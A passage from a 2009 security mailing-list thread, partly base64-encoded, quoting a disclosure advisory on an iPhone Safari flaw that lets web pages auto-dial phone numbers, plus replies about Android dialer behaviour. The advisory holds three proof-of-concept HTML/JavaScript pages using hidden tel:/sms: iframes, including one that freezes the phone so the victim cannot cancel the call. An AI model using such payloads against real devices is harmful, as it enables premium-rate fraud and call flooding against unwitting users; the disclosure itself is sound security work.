Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
